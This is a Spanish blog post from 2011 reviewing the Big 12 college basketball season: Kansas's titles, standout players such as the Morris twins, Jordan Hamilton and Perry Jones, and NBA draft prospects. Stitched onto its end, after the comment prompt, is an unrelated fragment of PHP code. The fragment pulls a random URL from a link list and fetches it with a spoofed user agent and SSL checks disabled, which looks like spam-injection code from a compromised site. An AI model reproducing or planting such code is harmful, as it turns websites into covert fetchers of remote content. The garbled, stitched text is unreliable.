Big 12 Conference

14 de March de 2011 por kantonyo

Los Jayhawks de Kansas han dominado totalmente la Conferencia Big 12 consiguiendo los títulos de campeón de la liga regular y del torneo final con cierta comodidad. Con un balance 32-2 durante toda la temporada se han colocado como el segundo equipo más importante del país en el baloncesto universitario.

Los gemelos Marcus y Markieff Morris han sumado entre los dos 31 puntos y 16 rebotes en 51 minutos con aciertos de tiro cercanos al 60%, siendo los dos jugadores con mejor eficiencia de la conferencia. Los dos juegan en el puesto de alapívot, se compenetran a la perfección y tienen unas cualidades similares entre las que destacan sus movimientos debajo del tablero. Marcus, mejor jugador del año en la Big12, parece a priori más preparado para el salto a la NBA aunque los dos pueden estar dentro del top 15 del próximo draft. En el poste alto también tienen la ayuda del joven Thomas Robinson de 19 años que a pesar de los pocos minutos que está en pista está dejando un gran sabor de boca con 8 puntos y 7 rebotes en sólo 15 minutos de juego.

En el perímetro, los Jayhawks también andan muy completos con los guards Tyshawn Taylor y Tyler Reed. Taylor fue el mejor en la final del torneo contra Texas anotando 20 puntos y entregando 5 asistencias. Taylor aspira igualmente a estar en los últimos lugares del próximo draft. El escolta freshman Josh Selby, uno de los mejores recruits del año está demostrando que todavía no está preparado para dar el salto a la NBA.

La Universidad de Texas se ha tenido que conformar con el doble subcampeonato después de una temporada muy irregular en la que ha alcanzado finalmente el puesto 10 en el ranking de la Associated Press. Jordan Hamilton, alero de segundo año, es su jugador más destacado. Hamilton es un jugador muy completo con un buen lanzamiento de tiro, que promedía 19 puntos y 8 rebotes y opta a entrar en el top 20 del draft. Por su parte, el alapívot Tristan Thompson se ha convertido en el mejor jugador de primer año de la conferencia. Destaca por su capacidad de rebote y sobre todo por su facilidad para taponar. Gracias a su gran final de temporada ha ido creciendo en los mockdraft situándose cerca del top 20. El base Cory Joseph, también de primer año, es el otro integrante de los Longhorns con posibilidades de estar en el próximo draft.

Los Aggies de Texas A&M han conseguido llegar a las semifinales del torneo después de haber conseguido un balance de 10-6 en la temporada regular de la conferencia situándose dentro del ranking AP top 25. Prácticamente tienen asegurada la participación en el torneo final de la NCAA. Los aleros Khris Middleton y Nathan Walkup forman la columna vertebral de la plantilla.

Kansas State ha sido la decepción de la temporada después de haber conseguido el año pasado llegar hasta los cuartos de final del March Madness y prácticamente haber consolidado su plantilla con la única baja de Denis Clemente. El escolta de cuarto año, Jacob Pullen, ha vuelto a ser el jugador más importante con 20 puntos.

La otra decepción, en este caso individual, está siendo el pívot de Baylor Perry Jones. El de Texas venía con la vitola de ser uno de los mejores recruits del año, y empezó la temporada a un nivel sobresaliente pero su buen rendimiento se ha visto truncado en las últimas semanas en las que el mal balance de su equipo (2-6) les deja prácticamente fuera del torneo final. Además, esta racha coincide con el bajón en el rendimiento de Jones y por si fuera poco ha sido suspendido hasta final de temporada por haber recibido beneficios económicos de forma ilegal. A pesar de ello, el talento del de Baylor es enorme y opta a top 10 del draft. Jones, que recuerda mucho a Anthony Randolph, es probablemente el jugador con más potencial de mejora de este año.

Otros jugadores que han destacado en la conferencia son el compañero de Perry Jones en Baylor, el base LaceDarius Dunn, que promedia 20 puntos por partido, el escolta Alec Burks de Colorado, que ha llevado su equipo a las semifinales del torneo contra todo pronóstico y que es el máximo anotador con 20,1 puntos de la Big 12, y el alapívot freshman de Colorado Buffalos Andre Roberson que a pesar sus escasos 2 metros promedia 8 rebotes en sólo 20 minutos.

Quinteto Ideal

C – Perry Jones (Baylor)
PF – Marcus Morris (Kansas)
SF – Jordan Hamilton (Texas)
SG – Alec Burks (Colorado)
PG – LaceDarius Dunn (Baylor)

Otros jugadores a seguir

– Centers: Jamie Vanderbeken (Iowa St)
– Forwards: Markieff Morris (Kansas), Laurence Bowers (Missouri), Marshall Moses (Oklahoma St), Tristan Thompson (Texas), Quincy Acy (Baylor), Ricardo Ratliffe (Missouri), Khris Middleton (Texas A&M), Andre Roberson (Colorado), Christian Standhardinger (Nebraska)
– Guards: Marcus Denmon (Missouri), Diante Garrett (Iowa St), Jacob Pullen (Kansas St), Lance Jeter (Nebraska), Cory Higgins (Colorado), Michael Dixon (Missouri), Josh Selby (Kansas), Cory Joseph (Texas), Tyshawn Taylor (Kansas)

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>